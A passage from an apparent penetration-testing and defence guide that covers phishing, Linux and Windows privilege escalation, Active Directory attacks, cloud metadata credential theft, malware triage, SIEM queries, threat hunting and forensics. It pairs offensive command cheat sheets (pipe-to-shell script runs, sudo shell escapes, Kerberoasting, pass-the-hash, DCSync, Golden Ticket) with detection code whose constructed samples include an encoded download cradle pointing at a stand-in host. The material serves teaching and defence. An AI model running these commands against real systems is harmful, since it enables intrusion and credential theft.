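    return "<p>%s</p>" % __import__("html").escape(user_text, quote=True)


def resolve_under_root(requested, root=FILES_ROOT):
    """Path-traversal guard: strip any leading slash, normalise the joined path and
    require the result to still sit inside the root. Returns None when it escapes."""
    base = Path(root).resolve()
    candidate = (base / requested.lstrip("/\\")).resolve()
    if candidate == base or base in candidate.parents:
        return candidate
    return None


def csrf_token(session_id, server_key):
    """Synchroniser token derived from the session: a form on evil.com can make the
    browser send the cookie, but cannot read or forge this value."""
    return hmac.new(server_key, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf(session_id, server_key, submitted):
    """Constant-time comparison of the submitted token against the expected one."""
    return hmac.compare_digest(csrf_token(session_id, server_key), submitted)


if __name__ == "__main__":
    print(render_comment("<img src=x onerror=alert(1)>"))
    print(resolve_under_root("../../etc/passwd"))
    print(resolve_under_root("reports/q1.pdf"))
    key = b"hypothetical-server-key"
    tok = csrf_token("sess-1", key)
    print(verify_csrf("sess-1", key, tok), verify_csrf("sess-2", key, tok))
```

The escaping shown is correct for HTML element content; attribute, JavaScript and URL contexts each need their own encoder, which is why template engines with contextual auto-escaping are preferred over hand-rolled calls.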
15
// HUMAN HACKING
Social Engineering & Physical Security
90%+ of breaches start with a phishing email. Humans are the weakest link.
🎣 Phishing: Fake emails/sites
📞 Vishing: Phone attacks
💬 Smishing: SMS phishing
🚶 Tailgating: Physical intrusion
🍬 Baiting: Infected USB drop
🎭 Pretexting: Fabricated scenario
# GoPhish — phishing campaigns
./gophish  # → https://localhost:3333
# 1. Configure SMTP sending profile
# 2. Clone target email template
# 3. Clone landing page (capture creds)
# 4. Add target users/groups CSV
# 5. Launch + track opens/clicks/submits
# Social Engineering Toolkit
setoolkit
# 1) SE Attacks → 2) Website Attack → 3) Credential Harvester
# Email header analysis
mxtoolbox.com/EmailHeaders  # check SPF/DKIM/DMARC
🛡 Defence Checklist
  • SPF + DKIM + DMARC on all email domains
  • Security awareness training + phishing simulation
  • MFA on every account (TOTP or hardware key)
  • Verify IT support calls via callback on known number
  • Physical: badge access, mantrap, clean desk
  • Disable USB auto-run. Endpoint DLP
  • One-click easy incident reporting
16
// POST EXPLOITATION
Privilege Escalation Techniques
Low-priv shell → SYSTEM/root. The art of escalation.
# LinPEAS — automated
curl -L https://github.com/.../linpeas.sh | sh
# SUID binaries
find / -perm -u=s -type f 2>/dev/null
# Found: /usr/bin/vim → vim -c ':!/bin/bash'
# Sudo misconfig
sudo -l  # (ALL) NOPASSWD: /usr/bin/python3
sudo python3 -c 'import os; os.system("/bin/bash")'
# Writable cron job
cat /etc/crontab
echo 'chmod +s /bin/bash' >> /opt/backup.sh
# DirtyPipe (CVE-2022-0847)
uname -r  # Linux < 5.16.11
# WinPEAS
.\WinPEAS.exe quiet
systeminfo
# Unquoted service paths
wmic service get name,pathname,startmode
# C:\Program Files\App\service.exe
# → place C:\Program.exe → runs as SYSTEM
# Token impersonation (SeImpersonatePrivilege)
meterpreter> load incognito
meterpreter> impersonate_token "NT AUTHORITY\SYSTEM"
# PrintSpoofer / GodPotato / JuicyPotato
.\PrintSpoofer.exe -i -c cmd
# AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
# Both = 1 → MSI payload runs as SYSTEM!
17
// ENTERPRISE ATTACKS
Active Directory Penetration Testing
95% of Fortune 500 companies use AD. Compromise it and you own the entire enterprise.
// ACTIVE DIRECTORY STRUCTURE
🌲 FOREST: corp.local
└─ 🏢 DOMAIN: corp.local
   ├─ 🏢 DOMAIN: subsidiary.corp.local
   └─ OU: Users
      ├─ OU: IT Admins
      │  ├─ 👤 User: jdoe (Domain Admin)
      │  └─ 💻 Computer: ADMIN-PC01
      └─ OU: Workstations
         └─ 💻 Computer: WS-001...WS-500
Key Objects to Target: KRBTGT account (Golden Ticket) · Domain Controller · GPO · ACLs · Service Accounts (Kerberoasting)
⚔ AD Attack Chain
1 · Initial Access
Phishing, password spray, VPN bruteforce → low-priv domain user
2 · Enumerate AD
BloodHound, PowerView — map attack paths, find Kerberoastable accounts
3 · Credential Attacks
Kerberoasting, AS-REP Roasting, LLMNR poisoning, Pass-the-Hash
4 · Lateral Movement
WMI, PSExec, Pass-the-Hash to privileged machines
5 · Domain Admin
DCSync attack → dump all domain hashes from DC
6 · Persistence
Golden Ticket (10 years!), Silver Ticket, Skeleton Key
🔑 Kerberoasting

Request service tickets for SPNs, crack offline. Service accounts often have weak passwords.

# Find Kerberoastable accounts
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
# Request service tickets
python3 GetUserSPNs.py corp.local/jdoe:Pass123 -outputfile hashes.txt
# Crack with hashcat
hashcat -m 13100 hashes.txt rockyou.txt
# AS-REP Roasting (no pre-auth required)
python3 GetNPUsers.py corp.local/ -usersfile users.txt
hashcat -m 18200 asrep.txt rockyou.txt
# ── BloodHound — Graph-based AD attack paths ──
SharpHound.exe -c All --zipfilename bloodhound.zip
# Import zip into BloodHound GUI
# Query: "Find Shortest Path to Domain Admin"
# ── LLMNR/NBT-NS Poisoning (Responder) ──
responder -I eth0 -wF
# Captures NetNTLMv2 hashes when user accesses non-existent shares
hashcat -m 5600 netntlmv2.txt rockyou.txt
# ── Pass-the-Hash ──
crackmapexec smb 192.168.1.0/24 -u Administrator -H <NTLM_HASH>
impacket-wmiexec -hashes :NTLMhash Administrator@192.168.1.10
# ── DCSync (needs Domain Admin/Replication rights) ──
python3 secretsdump.py corp.local/Administrator:Pass@DC01
# → dumps ALL domain hashes including KRBTGT!
# ── Golden Ticket ──
mimikatz # kerberos::golden /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:<hash> /user:Administrator
# Valid for 10 years. Works even after password changes!
🛡 AD Defence Checklist
  • Enable Protected Users security group for admin accounts
  • Disable LLMNR and NetBIOS over TCP/IP on all machines
  • Use Managed Service Accounts (gMSA) — auto-rotated 120-char passwords
  • Implement Tiered Administration — Tier 0/1/2 model
  • Enable Credential Guard on Windows 10+ endpoints
  • Disable unconstrained delegation on service accounts
  • Monitor for: 4769 (Kerberoast), 4768 (AS-REP), 4662 (DCSync)
  • Deploy Microsoft Defender for Identity (MDI) on DCs
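The "Monitor for: 4769, 4768, 4662" line of the checklist as working detection logic, run over constructed Windows Security events. This is an added example and not part of the MasterGuide. The page names only the event IDs; the heuristics layered on top are the standard ones and are my assumptions for this example: a Kerberoast shows as one user requesting RC4 (etype 0x17) service tickets for many distinct non-machine accounts, an AS-REP roast as a 4768 with pre-authentication type 0 and RC4, and a DCSync as a 4662 carrying the DS-Replication-Get-Changes control-access GUIDs from an account that is not a domain controller.

```python
from collections import defaultdict

RC4_ETYPE = "0x17"
KERBEROAST_SERVICE_THRESHOLD = 5  # distinct service accounts per requesting user
# DS-Replication-Get-Changes and DS-Replication-Get-Changes-All control-access rights
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
}


def _tgs(user, service, etype=RC4_ETYPE):
    """Constructed 4769 (service ticket requested) record."""
    return {"EventID": 4769, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "IpAddress": "10.0.5.21"}


# Constructed event sample: one roasting user, one normal user, one roastable service
# account without pre-auth, one replication request from a non-DC account
EVENTS = [_tgs("jdoe", s) for s in ("sqlsvc", "websvc", "backupsvc", "reportsvc", "ftpsvc")] + [
    _tgs("alice", "sqlsvc", "0x12"),   # AES ticket: normal application use
    _tgs("jdoe", "WS-042$"),           # machine-account service: ignored
    _tgs("jdoe", "krbtgt"),            # TGT renewal: ignored
    {"EventID": 4768, "TargetUserName": "backup-svc", "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": "2", "TicketEncryptionType": "0x12"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "Properties": ["{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"]},
    {"EventID": 4662, "SubjectUserName": "DC02$", "Properties": ["{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]},
]


def detect_kerberoast(events, threshold=KERBEROAST_SERVICE_THRESHOLD):
    """Users requesting RC4 tickets for at least `threshold` distinct user-service accounts.
    A production rule would also bound this to a short time window."""
    services = defaultdict(set)
    for e in events:
        if e.get("EventID") != 4769:
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        if e.get("TicketEncryptionType", "").lower() != RC4_ETYPE:
            continue
        services[e["TargetUserName"]].add(svc)
    return {user: sorted(s) for user, s in services.items() if len(s) >= threshold}


def detect_asrep_roast(events):
    """4768 without pre-authentication and with an RC4 ticket: the roastable pattern."""
    return [e["TargetUserName"] for e in events
            if e.get("EventID") == 4768 and e.get("PreAuthType") == "0"
            and e.get("TicketEncryptionType", "").lower() == RC4_ETYPE]


def detect_dcsync(events):
    """4662 with replication rights from anything that is not a DC machine account."""
    hits = []
    for e in events:
        if e.get("EventID") != 4662:
            continue
        guids = {p.strip("{}").lower() for p in e.get("Properties", [])}
        if not (guids & REPLICATION_GUIDS):
            continue
        if e["SubjectUserName"].endswith("$"):
            continue  # DCs replicate with each other legitimately
        hits.append(e["SubjectUserName"])
    return hits


if __name__ == "__main__":
    print("kerberoast:", detect_kerberoast(EVENTS))
    print("as-rep roast:", detect_asrep_roast(EVENTS))
    print("dcsync:", detect_dcsync(EVENTS))
```

The machine-account exclusion in detect_dcsync is a simplification: a tighter rule allowlists the actual domain controller accounts, since a compromised workstation account also ends in $.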
18
// CLOUD PENETRATION
Cloud Security — AWS, Azure & GCP
Misconfigured S3 buckets, IMDS exploitation, and IAM privilege escalation paths.
// CLOUD SHARED RESPONSIBILITY MODEL
☁ CLOUD PROVIDER
  • Physical hardware / datacenters
  • Hypervisor / virtualization
  • Network infrastructure
  • Foundational services
👤 YOUR RESPONSIBILITY
  • Data & classification
  • IAM policies and credentials
  • Application security
  • Network configuration (SGs, NACLs)
  • Encryption of data at rest/transit
AWS (Amazon Web Services): S3 Bucket Misconfiguration
Public read/write on S3 buckets exposes sensitive data. Often contains DB dumps, source code, private keys.
AWS (Amazon Web Services): IMDS v1 Exploitation
SSRF → http://169.254.169.254/latest/meta-data/iam/security-credentials/ → steal EC2 role credentials
Azure (Microsoft Azure): Azure AD Token Theft
Steal OAuth tokens from browser storage or apps. Use roadrecon to enumerate Azure AD via Graph API.
GCP (Google Cloud Platform): Default SA Over-Privilege
Default Compute SA has Editor role. Compromise one VM → pivot to entire project via metadata service.
AWS (Amazon Web Services): IAM Privilege Escalation
iam:PassRole + lambda:CreateFunction = admin via code. Use Pacu framework for automated escalation.
Azure (Microsoft Azure): Storage Account Exposure
Publicly accessible blob containers. SAS tokens exposed in URLs with excessively long validity periods.
# ── AWS Enumeration ──
aws s3 ls --no-sign-request  # list public buckets
aws s3 ls s3://bucket-name --no-sign-request
aws sts get-caller-identity  # who am I?
aws iam list-users
aws iam get-account-password-policy
# IMDS v1 (via SSRF or on EC2)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
# → Returns: AccessKeyId, SecretAccessKey, Token (temp creds!)
# ── Pacu — AWS exploit framework ──
pacu
Pacu> run iam__enum_permissions
Pacu> run iam__privesc_scan
# ── ScoutSuite — cloud security audit ──
scout aws --report-name report
# ── Azure ──
az login
az ad user list
roadrecon gather  # Azure AD enumeration
stormspotter  # Azure attack graph (like BloodHound)
# ── Find exposed secrets in code ──
truffleHog --regex https://github.com/target/repo
gitleaks detect --repo-path ./repo
19
// MALWARE SCIENCE
Malware Analysis & Reverse Engineering
Dissect malicious code to understand IOCs and evasion techniques.
🔬 Static Analysis
file malware.exe
strings malware.exe | grep -iE "http|cmd|pass|key"
sha256sum malware.exe  # → VirusTotal
pestudio malware.exe  # PE analysis
objdump -d malware.exe  # disassemble
# Ghidra / IDA Pro for deep RE
strings · PEStudio · Ghidra · VirusTotal
🏃 Dynamic Analysis (Sandbox)
  • Process Monitor — File, registry, network syscalls
  • Wireshark — Capture C2 traffic, DNS beacons
  • Any.run — Online interactive sandbox
  • Cuckoo Sandbox — Self-hosted automated analysis
  • x64dbg — Dynamic step-by-step debugging
Safety: Isolated VM only. Host-only network. Snapshot before. Never on production.
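The first three static-analysis commands (sha256sum, strings, grep for indicators) as a single triage routine, written as an added example that is not code from the MasterGuide. It pulls both ASCII and UTF-16LE strings, which plain `strings` misses on Windows binaries unless told to, and extracts URLs, IPv4 addresses and keyword hits. The sample bytes are a constructed stand-in for a binary, not a real malware sample.

```python
import hashlib
import re

MIN_LEN = 4
ASCII_RUN = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)   # UTF-16LE: char, NUL, char, NUL
URL_RE = re.compile(r"https?://[\w.\-]+(?:/[\w./\-?=&%]*)?", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
KEYWORDS = ("http", "cmd", "pass", "key", "powershell", "-enc")   # the page's grep terms, extended

# Constructed byte blob imitating a PE: DOS header text, a URL, a command line,
# an address, a UTF-16LE PowerShell string and a registry keyword, separated by NULs
SAMPLE = (b"MZ\x90\x00" + b"\x00" * 12
          + b"This program cannot be run in DOS mode.\r\n$" + b"\x00" * 16
          + b"http://c2.example.invalid/gate.php\x00"
          + b"cmd.exe /c whoami\x00"
          + b"192.0.2.15\x00" + b"\x00" * 8
          + "powershell -enc SQBFAFgA".encode("utf-16-le") + b"\x00" * 8
          + b"RegKey\x00")


def extract_strings(data):
    """ASCII runs followed by UTF-16LE runs, each at least MIN_LEN characters."""
    found = [m.group().decode("ascii") for m in ASCII_RUN.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in UTF16_RUN.finditer(data)]
    return found


def find_iocs(strings):
    """URLs, IPv4 literals and keyword hits from the extracted strings."""
    urls, ips, hits = [], [], []
    for s in strings:
        urls += URL_RE.findall(s)
        ips += IPV4_RE.findall(s)
        if any(k in s.lower() for k in KEYWORDS):
            hits.append(s)
    return {"urls": sorted(set(urls)), "ipv4": sorted(set(ips)), "keyword_hits": hits}


def triage(data):
    """Hashes for lookup (VirusTotal etc.) plus the string-derived indicators."""
    strings = extract_strings(data)
    report = {"sha256": hashlib.sha256(data).hexdigest(),
              "md5": hashlib.md5(data).hexdigest(),
              "string_count": len(strings)}
    report.update(find_iocs(strings))
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(key, value)
```

The UTF-16 pass is what surfaces the PowerShell string here; the ASCII regex cannot match it because every character is followed by a NUL byte.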
20
// SECURITY MONITORING
SIEM — Security Information & Event Management
The defender's eyes. Correlate millions of events to surface the needle in the haystack.
🔍 Splunk SPL Queries
# Failed logins (Event 4625)
index=security EventCode=4625 | stats count by src_ip, user | sort -count
# Port scanning detection
index=network | stats dc(dest_port) as ports by src_ip | where ports > 50
# PowerShell execution (Event 4104)
index=windows EventCode=4104 | search ScriptBlockText="*encodedCommand*" | table _time, user, host, ScriptBlockText
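The three SPL queries above as plain Python over key=value log lines, so the aggregation each one performs (count by, distinct-count with a threshold, substring filter) can be tested without a SIEM. This is an added example and not part of the MasterGuide; the log lines are constructed to resemble the fields the queries reference and are not real Splunk output.

```python
import re
from collections import Counter, defaultdict

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Constructed log lines in key=value form
SECURITY = ["EventCode=4625 src_ip=10.0.0.5 user=bob" for _ in range(3)] + [
    "EventCode=4625 src_ip=10.0.0.8 user=alice",
    "EventCode=4624 src_ip=10.0.0.8 user=alice",   # successful logon, not counted
]
NETWORK = ["src_ip=10.0.0.9 dest_ip=10.0.1.20 dest_port=%d" % p for p in range(1, 61)] + [
    "src_ip=10.0.0.7 dest_ip=10.0.1.20 dest_port=%d" % p for p in (80, 443, 22, 443)
]
WINDOWS = [
    'EventCode=4104 user=CORP\\jdoe host=WS-042 ScriptBlockText="powershell -encodedCommand SQBFAFgA"',
    'EventCode=4104 user=CORP\\alice host=WS-007 ScriptBlockText="Get-Process | Sort-Object CPU"',
    'EventCode=4103 user=CORP\\jdoe host=WS-042 ScriptBlockText="encodedCommand in a 4103, not matched"',
]


def parse_line(line):
    """key=value and key="quoted value" pairs into a dict."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def failed_logins(lines):
    """EventCode=4625 | stats count by src_ip, user | sort -count"""
    counts = Counter()
    for event in map(parse_line, lines):
        if event.get("EventCode") == "4625":
            counts[(event["src_ip"], event["user"])] += 1
    return counts.most_common()


def port_scanners(lines, threshold=50):
    """stats dc(dest_port) as ports by src_ip | where ports > threshold"""
    ports = defaultdict(set)
    for event in map(parse_line, lines):
        if "src_ip" in event and "dest_port" in event:
            ports[event["src_ip"]].add(event["dest_port"])
    return {ip: len(p) for ip, p in ports.items() if len(p) > threshold}


def encoded_powershell(lines):
    """EventCode=4104 search ScriptBlockText="*encodedCommand*" | table user, host, ScriptBlockText
    Splunk's match is case-insensitive, so the comparison is lower-cased here too."""
    rows = []
    for event in map(parse_line, lines):
        if event.get("EventCode") == "4104" and "encodedcommand" in event.get("ScriptBlockText", "").lower():
            rows.append((event["user"], event["host"], event["ScriptBlockText"]))
    return rows


if __name__ == "__main__":
    print(failed_logins(SECURITY))
    print(port_scanners(NETWORK))
    print(encoded_powershell(WINDOWS))
```

The distinct-count in port_scanners is the part that matters: a host repeatedly hitting port 443 is a client, a host touching sixty different ports is a scanner, and a plain event count cannot tell them apart.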
🦌 ELK Stack
  • Elasticsearch — Log storage
  • Logstash — Ingest & parse
  • Kibana — Dashboards
  • Beats — Lightweight shippers
21
// DEFENCE OPS
Blue Team Basics
Incident response, YARA rules, threat hunting — the defender's complete playbook.
// NIST INCIDENT RESPONSE LIFECYCLE
🔧 PREPARE: Policies · Tools
🔍 DETECT: SIEM · IDS
🔒 CONTAIN: Isolate · Block
🗑 ERADICATE: Remove · Patch
RECOVER: Restore · Verify
rule Detect_Mimikatz {
    meta:
        description = "Detects Mimikatz"
        severity = "critical"
    strings:
        $s1 = "sekurlsa" ascii wide
        $s2 = "mimikatz" ascii wide nocase
        $s3 = "lsadump" ascii wide
        $s4 = { 6D 69 6D 69 6B 61 74 7A }
    condition:
        2 of them
}
yara -r rules/ /path/to/scan/
🔭 Threat Hunting Steps
1 · Hypothesis
"PowerShell is being used for lateral movement"
2 · Collect Data
Pull PS event logs 4103/4104, network flows, process tree
3 · Analyse
Look for -encodedCommand, LOLBAS, unusual parent process chains
4 · Document IOCs
Export hashes, IPs, domains as IOC feed
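Step 3 of the hunt (look for -encodedCommand, LOLBAS, unusual parent process chains) over a constructed process tree, written as an added example that is not code from the MasterGuide. It decodes the Base64/UTF-16LE payload behind -EncodedCommand, flags a shell spawned by an Office application, flags a LOLBAS binary given a URL, and reconstructs the ancestry chain for the report. The process records, the encoded payload and the binary lists are constructed; the LOLBAS set is a small subset of the public LOLBAS project list.

```python
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
LOLBAS = {"certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe", "bitsadmin.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Constructed payload, encoded the way PowerShell expects (UTF-16LE, then Base64)
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a.ps1')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

# Constructed process tree: explorer -> winword -> powershell -> certutil, plus a benign powershell
PROCESSES = [
    {"pid": 1000, "ppid": 1, "name": "explorer.exe", "user": "CORP\\jdoe", "cmdline": "explorer.exe"},
    {"pid": 2100, "ppid": 1000, "name": "WINWORD.EXE", "user": "CORP\\jdoe", "cmdline": "WINWORD.EXE invoice.docm"},
    {"pid": 2200, "ppid": 2100, "name": "powershell.exe", "user": "CORP\\jdoe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENC},
    {"pid": 2300, "ppid": 2200, "name": "certutil.exe", "user": "CORP\\jdoe",
     "cmdline": "certutil.exe -urlcache -split -f http://c2.example.invalid/x.exe x.exe"},
    {"pid": 3000, "ppid": 1000, "name": "powershell.exe", "user": "CORP\\alice",
     "cmdline": "powershell.exe Get-Process"},
]


def decode_encoded_command(cmdline):
    """Recover the script hidden behind -EncodedCommand, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def ancestry(processes, pid):
    """Process names from the given pid up to the root, for the IOC report."""
    by_pid = {p["pid"]: p for p in processes}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid]["name"])
        pid = by_pid[pid]["ppid"]
    return chain


def hunt(processes):
    """(pid, finding, detail) triples for the three hypotheses."""
    by_pid = {p["pid"]: p for p in processes}
    findings = []
    for p in processes:
        name = p["name"].lower()
        parent = by_pid.get(p["ppid"])
        if parent and parent["name"].lower() in OFFICE_APPS and name in SHELLS:
            findings.append((p["pid"], "office-spawned shell", "%s -> %s" % (parent["name"], p["name"])))
        if name in LOLBAS and "http" in p["cmdline"].lower():
            findings.append((p["pid"], "LOLBAS download", p["cmdline"]))
        decoded = decode_encoded_command(p["cmdline"])
        if decoded is not None:
            findings.append((p["pid"], "encoded PowerShell", decoded))
    return findings


if __name__ == "__main__":
    for finding in hunt(PROCESSES):
        print(finding)
    print(ancestry(PROCESSES, 2300))
```

Each finding carries the pid so the next step, documenting IOCs, can pull the command line, the decoded script's URL and the full ancestry chain into the feed.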
22
// EVIDENCE & INVESTIGATION
Digital Forensics & Incident Response (DFIR)
Preserve evidence, analyse artefacts, reconstruct timelines. Chain of custody is sacred.
// DFIR EVIDENCE HIERARCHY (ORDER OF VOLATILITY)
1 · CPU Registers & Cache: Most volatile — lost immediately on shutdown. Capture first!
2 · RAM / Physical Memory: Running processes, network connections, decrypted data, passwords in memory
3 · Network State (ARP, connections, routing): Active connections, ARP cache, listening ports
4 · Running Processes & Open Files: Process list, open handles, temp files
5 · Disk / Storage: Least volatile. Files, logs, registry hives. Create forensic image first.
# Identify OS profile
volatility -f mem.raw imageinfo
# List running processes
vol.py -f mem.raw --profile=Win7SP1x64 pslist
vol.py -f mem.raw --profile=Win7SP1x64 pstree
# Find hidden/injected processes
vol.py -f mem.raw --profile=Win7SP1x64 malfind
# Network connections
vol.py -f mem.raw --profile=Win7SP1x64 netscan
# Extract password hashes from memory
vol.py -f mem.raw --profile=Win7SP1x64 hashdump
# Dump a process for analysis
vol.py -f mem.raw --profile=Win7SP1x64 procdump -p 1337 -D ./dumps/
# Registry hives
vol.py -f mem.raw --profile=Win7SP1x64 hivelist
# Create forensic image (write-blocker)
dd if=/dev/sdb of=image.dd bs=4k conv=noerror,sync
sha256sum image.dd > image.dd.sha256  # evidence hash!
# Mount read-only
mount -o ro,loop image.dd /mnt/evidence
# Autopsy (GUI forensics platform)
autopsy  # → http://localhost:9999/autopsy
# File carving — recover deleted files
foremost -t all -i image.dd -o ./output
photorec image.dd  # interactive
# Browser artifact extraction
hindsight -i "~/.config/chromium/Default" -o report
# Windows event log analysis
python3 evtx_dump.py Security.evtx | jq .
chainsaw hunt ./evtx/ -s sigma-rules/ --mapping sigma-map.yml
🔍 Key Windows Artefacts
  • Event Logs — C:\Windows\System32\winevt\Logs\
  • Registry — NTUSER.DAT, SAM, SYSTEM, SECURITY, SOFTWARE
  • Prefetch — C:\Windows\Prefetch\ (program execution)
  • Shellbags — Folder browsing history in registry
  • LNK files — Recent files accessed
  • Jump Lists — Recently accessed files per app
  • Browser History — SQLite DBs in user profile
🐧 Key Linux Artefacts
  • /var/log/auth.log — Authentication, sudo, SSH
  • /var/log/syslog — System events
  • ~/.bash_history — Command history
  • /etc/cron.* — Scheduled tasks
  • /tmp/ /var/tmp/ — Often used for staging
  • /proc/ — Live system state
  • auditd logs — If enabled: full syscall audit
📋 Chain of Custody
  • Document EVERY action taken on evidence
  • Hash evidence before and after handling
  • Never work on original — always a forensic copy
  • Use write-blockers for disk imaging
  • Record: who, when, where, what for all evidence
  • Seal physical evidence with tamper-evident tape
Contaminated evidence is inadmissible in court. One mistake = case dismissed.
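The "hash before and after handling" and "record who, when, where, what" items of the checklist as a small append-only custody log, written as an added example that is not part of the MasterGuide. It streams the SHA-256 of an image (so a multi-GB file is never read into memory), records every handling step with a UTC timestamp, and verifies the current hash against the acquisition hash; the demo writes a constructed "image" to a temporary directory, handles it twice, then appends a byte to show the verification failing.

```python
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone


def sha256_file(path, chunk_size=1 << 20):
    """Streamed digest: reads 1 MiB at a time so large images fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


class CustodyLog:
    """Append-only record of who did what to which evidence item, when and where,
    with the item's hash at that moment."""

    def __init__(self):
        self.entries = []

    def record(self, evidence_path, action, handler, location, note=""):
        entry = {
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "evidence": os.path.basename(evidence_path),
            "action": action,
            "handler": handler,
            "location": location,
            "sha256": sha256_file(evidence_path),
            "note": note,
        }
        self.entries.append(entry)
        return entry

    def baseline_hash(self, evidence_path):
        """Hash recorded at the first (acquisition) entry for this item."""
        name = os.path.basename(evidence_path)
        for entry in self.entries:
            if entry["evidence"] == name:
                return entry["sha256"]
        return None

    def verify(self, evidence_path):
        """True only when the current hash still equals the acquisition hash."""
        baseline = self.baseline_hash(evidence_path)
        return baseline is not None and sha256_file(evidence_path) == baseline

    def to_json(self):
        return json.dumps(self.entries, indent=2)


def demo():
    """Constructed evidence file: two clean handling steps, then a modification."""
    workdir = tempfile.mkdtemp()
    image = os.path.join(workdir, "image.dd")
    with open(image, "wb") as f:
        f.write(b"constructed disk image bytes " * 1000)
    log = CustodyLog()
    log.record(image, "acquired with write-blocker", "analyst-1", "lab bench 3")
    log.record(image, "mounted read-only for analysis", "analyst-2", "forensic workstation")
    intact_before = log.verify(image)
    with open(image, "ab") as f:
        f.write(b"!")   # someone worked on the original instead of a copy
    return {
        "entries": len(log.entries),
        "intact_before": intact_before,
        "intact_after": log.verify(image),
        "hash_stable": log.entries[0]["sha256"] == log.entries[1]["sha256"],
    }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

A real log is itself evidence: write it to append-only storage or sign each entry, since a custody record that the handler can silently rewrite proves nothing.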
23
// HANDS-ON PRACTICE
CTF & Cyber Range Practice
Theory without practice is just trivia. Real skills come from 10,000 hours of hands-on hacking.
🏆 Best Practice Platforms
Platform | Level | Best For | Cost
TryHackMe | Beginner | Guided paths, browser VMs | Free+Pro
HackTheBox | Intermediate | Real-world machines | Free+VIP
PicoCTF | Beginner | Year-round CTF, CMU | Free
VulnHub | All | Offline VM practice | Free
PortSwigger | Intermediate | Best web app labs | Free
HackerOne | Advanced | Real bug bounty programs | Free
🎯 CTF Toolkit by Category
Category | Key Tools
🌐 Web | Burp Suite · sqlmap · ffuf · jwt_tool
🔐 Crypto | CyberChef · RsaCtfTool · hashcat
🔍 Forensics | Autopsy · Volatility · binwalk · exiftool
⚙️ Reversing | Ghidra · IDA Free · x64dbg · Radare2
💥 Pwn/BoF | pwntools · GDB+PEDA · ROPgadget · checksec
🕵️ OSINT | Maltego · Shodan · SpiderFoot
🌐 Network | Wireshark · tcpdump · NetworkMiner
// CERTIFICATION ROADMAP — ZERO TO ELITE
Security+ (CompTIA): Foundation
CEH (EC-Council)
eJPT (INE)
OSCP (OffSec)
CRTO (RastaMouse)
CCNA / AWS: Cloud/Network
OSED / CRTE: Elite Track
1 · Networking + Linux Fundamentals: OSI, TCP/IP, subnetting, Linux CLI — 3–4 weeks [BEGINNER]
2 · Cryptography Fundamentals: Hashing, AES, RSA, TLS — understand before you attack [BEGINNER+]
3 · Recon + Scanning + Enumeration: OSINT, Google dorks, Nmap, SMB/DNS/SMTP enum — 3 weeks [BEGINNER+]
4 · Web Application Hacking: OWASP Top 10, Burp Suite, SQLi, XSS, IDOR, API — 4–6 weeks [INTERMEDIATE]
5 · Network Pentesting + Metasploit: Exploits, wireless, pivoting, password attacks — 4 weeks [INTERMEDIATE]
6 · Active Directory Attacks: Kerberoasting, BloodHound, DCSync, Golden Ticket — 4 weeks [ADVANCED]
7 · Cloud Security (AWS/Azure/GCP): S3 misconfig, IMDS exploit, IAM escalation, Pacu — 3 weeks [ADVANCED]
8 · Blue Team / DFIR / SIEM: Incident response, Volatility, YARA, log analysis, threat hunt — 4 weeks [ADVANCED]
9 · CTF Practice + Bug Bounty: TryHackMe → HackTheBox → OSCP labs → HackerOne [ONGOING ∞]